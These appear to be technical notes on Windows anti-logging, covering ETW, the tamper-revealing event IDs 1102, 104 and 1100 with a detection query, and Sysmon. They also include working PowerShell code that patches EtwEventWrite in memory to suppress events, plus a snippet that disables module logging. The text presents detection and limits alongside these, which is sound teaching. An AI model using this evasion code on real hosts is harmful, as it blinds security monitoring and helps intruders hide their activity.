Anti-logging techniques

1. Event Tracing for Windows (ETW)

Logging and monitoring solutions create a persistent record of host activity that can be analyzed, manually or by detection rules, for signs of malicious behaviour. A monitoring pipeline usually begins on the host, where application and system event logs are collected, and forwards them from the host to a central event collector, typically a SIEM (Security Information and Event Management) system.

An attacker with administrative privileges on a host can tamper with the logs that are generated and stored locally, before they are forwarded. The primary target is the Event Tracing for Windows (ETW) component: almost all event logging in Windows, from user-mode applications down to the kernel, goes through ETW, so it has visibility over most of the OS and records almost every OS-level action. ETW is a core component of Windows and cannot be disabled completely; the techniques below blind or suppress parts of it for a specific process or session.

Event IDs are a core feature of the Windows logging subsystem: almost every action in Windows has a corresponding event ID (Microsoft publishes a list of all event IDs). Each event can be rendered as XML, with a <System> block (provider, event ID, time, computer) and an <EventData> or <UserData> block carrying the event-specific fields.

There are event IDs that reveal log tampering attempts. All three are written to a log the attacker can also clear, so they are only useful if logs are forwarded promptly:

  • 1102 - the Windows Security audit log was cleared (written to the Security log by Microsoft-Windows-Eventlog, including the account that cleared it).
  • 104 - an event log (Application, System, ...) was cleared (written to the System log, with the Channel that was cleared).
  • 1100 - the Windows Event Log service was shut down (written to the System log; expected at shutdown, suspicious on a running host).
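A small detection query over those three event IDs, added here as an example and not part of the original notes. It assumes a Windows host and an elevated PowerShell session (the Security log is not readable by standard users). The Account and Channel fields come from the <UserData><LogFileCleared> block that events 1102 and 104 carry; 1100 has no actor, so those fields stay empty for it:

```powershell
function Get-LogTamperEvent {
    param([int]$MaxEvents = 50)

    # The three tamper indicators live in two logs; querying by log + ID is far cheaper
    # than pulling everything and filtering in PowerShell.
    $queries = @(
        @{ LogName = 'Security'; Id = 1102 },      # Security log cleared
        @{ LogName = 'System';   Id = 104, 1100 }  # another log cleared / Event Log service stopped
    )

    foreach ($q in $queries) {
        # -ErrorAction SilentlyContinue: Get-WinEvent throws when a query matches nothing
        Get-WinEvent -FilterHashtable $q -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
            ForEach-Object {
                # Every event renders as XML; 1102 and 104 name the actor under <UserData><LogFileCleared>
                $x = [xml]$_.ToXml()
                $cleared = $x.Event.UserData.LogFileCleared
                $account = $null
                $channel = $null
                if ($cleared) {
                    $account = "$($cleared.SubjectDomainName)\$($cleared.SubjectUserName)"
                    $channel = $cleared.Channel   # present for 104 only; 1102 is always the Security log
                }
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Id      = $_.Id
                    Log     = $_.LogName
                    Host    = $x.Event.System.Computer
                    Account = $account
                    Channel = $channel
                }
            }
    }
}

# Usage: run elevated, newest first
Get-LogTamperEvent -MaxEvents 20 | Sort-Object Time -Descending | Format-Table -AutoSize
```

The same query shape (LogName plus Id in a filter hashtable) is what a SIEM collector or a scheduled hunting script would run; on a host where the attacker has already cleared the System log, the query returns nothing locally, which is exactly why the forwarded copy matters.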

1.1. ETW vs Sysmon

ETW and Sysmon are both used for monitoring and logging events on Windows. ETW is a built-in Windows feature; Sysmon (System Monitor) is part of the Sysinternals toolkit and is installed as a service plus a kernel driver. Sysmon is focused on security monitoring and threat detection: it is designed to provide detailed information about system activity (process creation with hashes and command lines, network connections, driver and image loads, registry and file events) to help detect and investigate incidents. ETW is the more general facility and not specifically security-focused; it also carries performance, debugging and diagnostics events.

Sysmon requires an XML configuration file that specifies which events to record and how to filter them, and it adds some overhead to the system, whereas ETW itself has minimal performance impact. The two are not independent: Sysmon writes its events through its own ETW provider into the Microsoft-Windows-Sysmon/Operational log, and its driver observes activity from the kernel side. Patching ETW inside one process (section 1.3) therefore silences that process's own events but does not stop Sysmon from recording what the process does.

1.2. Usage

# Get ETW events in PowerShell: list the logs that actually hold records, then read the newest entries of one
Get-WinEvent -ListLog * -ErrorAction SilentlyContinue | Where-Object { $_.RecordCount -gt 0 }
Get-WinEvent -LogName Security -MaxEvents 20
# Get-WinEvent reads the event log channels; consuming an ETW provider directly needs a trace session (logman query providers)

1.3. In-memory patching

The user-mode ETW API (EtwEventWrite and related functions) is exported by ntdll.dll, which is mapped into every user-mode process. Because that mapping is private to the process, the process can overwrite the first bytes of its own copy of EtwEventWrite so that the function returns before the event is written. The patch affects only that process (and anything hosted in it, such as the CLR or PowerShell), not other processes or kernel-mode providers, and it is easy to detect by comparing the function's first bytes in memory with the on-disk ntdll.dll.

  1. Get the address of EtwEventWrite (GetModuleHandle or LoadLibrary on ntdll.dll, then GetProcAddress).
  2. Make the page writable (VirtualProtect with PAGE_EXECUTE_READWRITE).
  3. Overwrite the function's first opcodes with an early return, e.g. xor eax,eax; ret, so callers get STATUS_SUCCESS and nothing is written.
  4. Restore the original page protection.
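The four steps carried out from PowerShell with P/Invoke, added here as an example rather than code from the original notes. It assumes 64-bit Windows PowerShell in an x64 process and should be run in a throwaway session: after the patch, nothing this process emits through EtwEventWrite (including PowerShell's own ETW events) reaches a log, while other processes, kernel providers and Sysmon are unaffected. The read-back helper doubles as the check a defender would run against a suspect process:

```powershell
# Native is a hypothetical helper type defined here for the example
if (-not ('Native' -as [type])) {
    Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class Native {
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr GetModuleHandle(string lpModuleName);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize,
                                             uint flNewProtect, out uint lpflOldProtect);
}
"@
}

function Get-FunctionBytes([IntPtr]$Address, [int]$Count) {
    # Read the first bytes of a function: used to verify the patch, or to detect one by
    # comparing against the prologue in the on-disk ntdll.dll
    $buf = New-Object byte[] $Count
    [Runtime.InteropServices.Marshal]::Copy($Address, $buf, 0, $Count)
    ($buf | ForEach-Object { '{0:X2}' -f $_ }) -join ' '
}

function Disable-EtwInCurrentProcess {
    # Step 1: ntdll is always loaded, so GetModuleHandle is enough (no LoadLibrary needed)
    $ntdll = [Native]::GetModuleHandle('ntdll.dll')
    $addr  = [Native]::GetProcAddress($ntdll, 'EtwEventWrite')
    if ($addr -eq [IntPtr]::Zero) { throw 'EtwEventWrite not found in ntdll.dll' }

    # Step 3 payload, x64: "xor eax,eax ; ret" returns STATUS_SUCCESS (0) without writing the event.
    # On x86 EtwEventWrite is stdcall and would need "ret 0x14" to pop its arguments.
    $patch = [byte[]](0x33, 0xC0, 0xC3)
    $size  = [UIntPtr]::new([uint32]$patch.Length)
    $old   = [uint32]0
    $PAGE_EXECUTE_READWRITE = 0x40

    Write-Host "before: $(Get-FunctionBytes $addr $patch.Length)"
    # Step 2: make the code page writable
    if (-not [Native]::VirtualProtect($addr, $size, $PAGE_EXECUTE_READWRITE, [ref]$old)) {
        throw "VirtualProtect failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    # Step 3: overwrite the prologue
    [Runtime.InteropServices.Marshal]::Copy($patch, 0, $addr, $patch.Length)
    # Step 4: put the original protection back so the page is not left RWX (itself a detection signal)
    $null = [Native]::VirtualProtect($addr, $size, $old, [ref]$old)
    Write-Host "after:  $(Get-FunctionBytes $addr $patch.Length)"
}

Disable-EtwInCurrentProcess
```

The "after" line reads 33 C0 C3 on success. A hunting check is the inverse of Get-FunctionBytes: read the same bytes from every interesting process and flag any whose EtwEventWrite prologue does not match the version of ntdll.dll on disk.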

1.4. Powershell Log Pipeline

The snippet below can be appended to any PowerShell script to turn off module logging (Event ID 4103 in Microsoft-Windows-PowerShell/Operational) for the modules already imported into the current session. Module logging is a per-module switch, the LogPipelineExecutionDetails property; modules imported later start with the policy value again, and script block logging (Event ID 4104) is not affected, so the snippet itself is still recorded if script block logging is enabled.

# Module logging is a per-module switch (LogPipelineExecutionDetails); turn it off for every module imported so far
foreach ($module in Get-Module) {
    $module.LogPipelineExecutionDetails = $false
}
# The core cmdlets live in the Microsoft.PowerShell.Core snap-in, which has the same switch
# (Windows PowerShell only: Get-PSSnapin does not exist in PowerShell 7)
$snap = Get-PSSnapin Microsoft.PowerShell.Core -ErrorAction SilentlyContinue
if ($snap) { $snap.LogPipelineExecutionDetails = $false }
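To see what the snippet changes and what it leaves behind, the following check is added here as an example and is not part of the original notes. The registry paths are the policy keys written by the "Turn on Module Logging" and "Turn on PowerShell Script Block Logging" Group Policy settings; Get-PSLoggingState is a hypothetical helper name, and the run assumes Windows PowerShell 5.1 with the Microsoft.PowerShell.Archive module available to import:

```powershell
function Get-PSLoggingState {
    $base  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $ml    = Get-ItemProperty "$base\ModuleLogging"             -ErrorAction SilentlyContinue
    $names = Get-ItemProperty "$base\ModuleLogging\ModuleNames" -ErrorAction SilentlyContinue
    $sb    = Get-ItemProperty "$base\ScriptBlockLogging"        -ErrorAction SilentlyContinue
    [pscustomobject]@{
        # Policy side: what new sessions and newly imported modules will do
        ModuleLoggingPolicy      = [bool]$ml.EnableModuleLogging
        ModuleNamesInPolicy      = @($names.PSObject.Properties |
                                       Where-Object { $_.Name -notlike 'PS*' } |
                                       ForEach-Object { $_.Value })   # "*" means every module
        ScriptBlockLoggingPolicy = [bool]$sb.EnableScriptBlockLogging
        # Session side: the per-module switch the anti-logging snippet flips
        LoadedModulesLogging     = @(Get-Module | Where-Object { $_.LogPipelineExecutionDetails }).Name
        LoadedModulesNotLogging  = @(Get-Module | Where-Object { -not $_.LogPipelineExecutionDetails }).Name
    }
}

Get-PSLoggingState

# Apply the snippet, then import a module that was not loaded yet and look again:
foreach ($m in Get-Module) { $m.LogPipelineExecutionDetails = $false }
Import-Module Microsoft.PowerShell.Archive

Get-PSLoggingState
```

With module logging enabled by policy for "*", the second report lists every previously loaded module under LoadedModulesNotLogging but Microsoft.PowerShell.Archive under LoadedModulesLogging, because the later import picked the policy default up again; ScriptBlockLoggingPolicy is unchanged throughout, which is why the snippet itself still lands in the 4104 events.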